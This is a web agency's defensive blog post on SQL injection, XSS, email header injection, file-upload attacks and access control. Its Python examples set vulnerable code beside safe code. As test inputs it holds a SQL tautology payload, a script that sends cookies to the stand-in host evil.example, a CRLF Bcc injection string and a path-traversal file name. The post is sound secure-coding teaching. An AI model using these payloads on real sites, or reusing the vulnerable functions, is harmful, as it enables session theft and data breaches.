Here at Wubbleyou, we like to keep our customers up to date with the latest news from Wubbleyou HQ, new technologies available and also articles on current IT related stories. If it’s happening on the world wide web, we’re probably blogging about it!
One of the most common attack vectors, and one with the most devastating results, is SQL injection. SQL injection occurs when text typed by a user (a login box, a search field, a URL parameter) is pasted straight into a database query, so that a malicious user can change what the query means and read, modify or even erase information stored in your database. SQL injection is easily avoidable but tends to be overlooked or untested, especially in older websites.
SQL Injection Prevention
There are several proven methods to prevent this, all of which we employ. The most effective is never to build a query by joining strings together: use parameterised queries (prepared statements), or a data-access library that uses them, so that the SQL text is fixed and the user's values are handed to the database separately. Beyond that, the basic rule is to trust no data received from any user and to validate all input as a second line of defence, not as the only one.
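Here is an added example (written for this article, not Wubbleyou's own code) of the difference between the two styles of query, run against a throwaway in-memory SQLite database. The table, the user record and the two login functions are assumptions made for the demonstration.

```python
import sqlite3

# Constructed in-memory database for the demonstration. The table, the user
# and the login functions are assumptions for this example, not Wubbleyou's code.
# (Passwords are compared in plain text here only to keep the example short;
# a real system stores a salted, slow hash instead.)
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
conn.commit()

# Classic tautology payload typed into the username box: the first quote closes
# the string literal, OR 1=1 makes the WHERE clause true for every row, and the
# trailing -- comments out the rest of the statement, password check included.
PAYLOAD = "' OR 1=1 --"


def login_vulnerable(username, password):
    """Builds the statement by string concatenation, so the user's text becomes
    part of the SQL and can change what the query means."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """Parameterised query: the SQL text is fixed and the values travel
    separately, so quotes, comments and keywords in the input are just data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(login_vulnerable("alice", "correct-horse"))  # alice
    print(login_vulnerable(PAYLOAD, "wrong"))          # alice, with no password at all
    print(login_safe("alice", "correct-horse"))        # alice
    print(login_safe(PAYLOAD, "wrong"))                # None
```

The `?` placeholder is SQLite's; other database drivers use `%s` or named parameters, but the principle is the same. Note that no amount of "escaping quotes" in `login_vulnerable` gives the same guarantee, because the attacker's text is still being parsed as SQL.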
According to the security firm Symantec, XSS accounted for around 80% of the website vulnerabilities documented in 2007. XSS is a method whereby a malicious user injects script into your website's pages, which then runs in your visitors' browsers, to complete a range of actions from stealing your clients' login details and session cookies to installing malicious software on your users' computers. Websites that have been exploited by this can be blacklisted and marked by search engines as unsafe, making it paramount that this issue is checked for.
Cross Site Scripting (XSS) Prevention
To prevent this it is also necessary to validate all user input, but the decisive step is on the way out: every piece of user-supplied data must be encoded when it is written into a page, using the encoding appropriate to where it lands (HTML body, HTML attribute, JavaScript or URL). Modern template engines do this automatically; hand-built string concatenation does not. Again, all websites created by Wubbleyou are screened and methods are put in place to prevent this.
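As an added illustration (not code from the original article), the following shows a visitor's comment being written into a page with and without output encoding, and why the attribute context needs quoting as well as encoding. The comment text and the tiny page fragments are constructed for the example.

```python
import html

# Constructed visitor comment containing a script tag, the sort of thing a
# stored-XSS probe submits through a comment or review form.
COMMENT = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Constructed attribute payload: tries to close the value attribute and add
# an event handler to the element.
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_comment_vulnerable(comment):
    """Drops the raw text into the HTML body; the browser parses the script tag."""
    return '<p class="comment">' + comment + '</p>'


def render_comment_safe(comment):
    """HTML-body context: encode &, <, >, " and ' so the text is displayed,
    not interpreted as markup."""
    return '<p class="comment">' + html.escape(comment, quote=True) + '</p>'


def render_attribute_safe(value):
    """HTML-attribute context: encode AND always quote the attribute. An
    unquoted attribute can be broken out of with a plain space, which no
    encoding function touches."""
    return '<input type="text" name="q" value="' + html.escape(value, quote=True) + '">'


if __name__ == "__main__":
    print(render_comment_vulnerable(COMMENT))   # contains a live <script> tag
    print(render_comment_safe(COMMENT))         # &lt;script&gt;... displayed as text
    print(render_attribute_safe(ATTR_PAYLOAD))  # &quot; onmouseover=&quot;alert(1)
```

`html.escape` is only right for HTML body and quoted-attribute contexts; data placed inside a `<script>` block or a URL needs JavaScript or URL encoding respectively, which is why template engines track the context for you.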
This vulnerability is slightly less well known and sometimes overlooked. Email headers are separated by line breaks, so if a contact form copies what the visitor typed (their email address, say) straight into a header, a malicious user can include a line break followed by an extra header such as Bcc: and force the form to email many people instead of just you. This is exploited to turn your website into a relay for large amounts of spam. If this is occurring, your email address and server may be blacklisted as a known source of spam.
Email Form Header Injection Prevention
Again the way to prevent this is to screen user input: reject any value destined for a header that contains a carriage return or line feed, never let the form decide who the recipient is, and put free text only in the message body, where line breaks are harmless.
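Here is an added example (written for this article, not Wubbleyou's own contact-form code) of a vulnerable header block next to a safe one, using Python's standard email library. The site address and the hostile form input are constructed for the demonstration.

```python
import email
from email.message import EmailMessage

SITE_OWNER = "enquiries@example.com"   # assumed fixed recipient of the form

# Constructed attacker input for the "your email address" box: a CR/LF pair
# followed by a Bcc: header, so one enquiry becomes mail to whoever is listed.
HOSTILE_FROM = "visitor@example.net\r\nBcc: victim1@example.org, victim2@example.org"


def build_vulnerable(visitor_email, message):
    """Concatenates the visitor's text straight into the header block, the way
    many older contact-form scripts build their headers. The raw text is parsed
    here only to show which headers the mail server would see."""
    raw = ("To: " + SITE_OWNER + "\r\n"
           "Reply-To: " + visitor_email + "\r\n"
           "Subject: Website enquiry\r\n"
           "\r\n" + message + "\r\n")
    return email.message_from_string(raw)


def is_safe_address(value):
    """Rejects anything containing a header separator (CR or LF) and anything
    that is not a single bare address with a dotted domain."""
    if "\r" in value or "\n" in value or " " in value:
        return False
    local, at, domain = value.partition("@")
    return bool(at) and bool(local) and "." in domain


def build_safe(visitor_email, message):
    """Fixed recipient, validated reply address, free text only in the body."""
    if not is_safe_address(visitor_email):
        raise ValueError("invalid email address in contact form")
    msg = EmailMessage()
    msg["To"] = SITE_OWNER          # never taken from the form
    msg["Reply-To"] = visitor_email
    msg["Subject"] = "Website enquiry"
    msg.set_content(message)        # line breaks here cannot create headers
    return msg


if __name__ == "__main__":
    print(build_vulnerable(HOSTILE_FROM, "Hello")["Bcc"])   # the two victims
    print(build_safe("visitor@example.net", "Hello")["To"])  # enquiries@example.com
```

The validation is deliberately strict rather than a full RFC 5322 parser: a contact form only ever needs one plain address, so anything more exotic can simply be refused.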
This can occur anywhere on your website where you allow users to upload files. If they succeed in uploading a file that the web server will run as a script (a PHP or ASP file disguised as an image, for example) and can then reach it by URL, they can execute code on your server, gain full control of your website and most likely full access to your database.
Malicious File Upload and Execution Prevention
It is important to validate firstly the file name and then the true nature of the file before storing it on your website. Neither the extension the visitor chose nor the content type their browser sent can be trusted: it is fairly easy to disguise a malicious payload as an image file or Word document, upload it to your website and execute it later. The file's contents should be checked against what the extension claims, the file should be stored under a name the server chooses, and it should live outside the web root so that it is only ever served as a download, never run.
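The following is an added example (not the original article's code) of the checks described above applied to a few constructed uploads: a genuine PNG, a PHP file, a PHP file renamed to .png, a double-extension name and a path-traversal name. The upload directory, the allowed-type table and the sample files are assumptions for the demonstration.

```python
import os
import secrets

# Assumed storage directory outside the web root: files here are handed out by
# a download handler with a fixed Content-Type and are never executed.
UPLOAD_DIR = "/var/www/uploads-private"

# Allowed types: extension -> the magic bytes a genuine file of that type starts with.
ALLOWED = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "pdf": [b"%PDF-"],
}

# Constructed sample uploads: a PNG signature plus filler, and a PHP snippet.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_FILE = b"<?php echo 'hello'; ?>"


def check_upload(filename, content):
    """Returns (True, extension) for an acceptable upload or (False, reason)."""
    base = os.path.basename(filename)
    if base != filename or base.startswith("."):
        return False, "path component or hidden-file name"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # Exactly one extension: blocks shell.php.png and similar tricks that
        # some server configurations interpret by the first extension.
        return False, "missing or multiple extensions"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    return True, ext


def stored_name(ext):
    """Random server-chosen name; the visitor's file name never reaches the disk."""
    return secrets.token_hex(16) + "." + ext


def store_path(filename, content):
    """Full path the file would be written to, or None if it is rejected."""
    ok, result = check_upload(filename, content)
    if not ok:
        return None
    return os.path.join(UPLOAD_DIR, stored_name(result))


if __name__ == "__main__":
    for name, data in [("holiday.png", GOOD_PNG), ("shell.php", PHP_FILE),
                       ("shell.png", PHP_FILE), ("shell.php.png", GOOD_PNG),
                       ("../../etc/cron.d/job.png", GOOD_PNG)]:
        print(name, "->", check_upload(name, data))
```

A magic-bytes check does not stop a polyglot file that is both a valid image and a valid script, which is exactly why the last two rules matter most: a random name in a directory the web server only reads from cannot be executed no matter what is inside it.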
It is important that any information you want to show one group of users but hide from another is properly secured. Every request for a protected page or record must be checked on the server, not just hidden in the menu: it must be ensured that the user is properly authenticated and authorised, and cannot spoof their way into a protected area (for example by editing an ID in the URL) or circumvent the security features completely.
Sometimes a lot of trust is placed in the users in your system or company whom you employ to run your website and who therefore have elevated privileges. It is paramount that each user has their own login details, that shared accounts are never used, and that all actions they take are logged, making every user accountable for what they have done, especially if it was malicious.
All errors triggered by a user, whether accidentally or maliciously, should be properly handled so as not to give away any information about the inner workings of your system: the user should see a generic error page, while the full detail (stack trace, SQL error, file paths) goes to a log that only you can read.
At Wubbleyou we employ a strict set of security policies whilst creating every website to ensure that no loose end is left which could lead to any of the above. If you already have a website which you suspect could be susceptible to one of the above, we can also audit and patch an existing website. If you aren't sure, get in touch and we can even complete a basic assessment free of charge!
If you store user data it is very important that sensitive data (such as personal details and credit card numbers) is secured. If you are storing that information in plain text and your system is compromised, everything in the database is immediately in the attacker's hands. For this reason we also provide a service whereby we ensure all the important information in your system is encrypted with current, well-reviewed algorithms, with passwords stored as salted, slow hashes rather than encrypted at all, so that a stolen copy of the data cannot realistically be cracked.
Please feel free to contact us if you have any concerns whatsoever.